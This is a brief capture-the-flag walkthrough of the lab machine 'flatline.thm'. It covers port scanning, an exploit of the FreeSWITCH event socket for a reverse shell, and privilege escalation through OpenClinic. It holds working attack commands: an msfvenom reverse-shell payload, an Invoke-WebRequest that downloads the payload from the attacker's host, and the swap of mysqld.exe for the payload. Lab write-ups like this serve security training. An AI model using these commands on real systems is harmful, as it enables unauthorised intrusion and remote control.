nmap
nmap -sV -p- -Pn -T4 flatline.thm
Port 3389
3389/tcp open ms-wbt-server Microsoft Terminal Services
Certificate
I’m searching on google but there is nothing interesting.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp
Port 8021
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Google:
https://www.exploit-db.com/exploits/47799
The exploit give nothing but it he say Authenticated.
SI decided to execute a revershell.
https://www.revshells.com/
With the PowerShell #3 (Base64)
First flag
C:\Users\Nekrotic\DesktopOpenclinic
Interesting
https://www.exploit-db.com/exploits/50448
create the malicious exe file
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4242 -f exe > mysqld_evil.exeDownload it
Invoke-WebRequest -Uri "http://10.8.50.167:8000/mysqld_evil.exe" -OutFile "mysqld_evil.exe"
Rename it
Rename-Item mysqld.exe mysqld.exe.old
Rename-Item mysqld_evil.exe mysqld.exeReboot
Listen first then reboot.
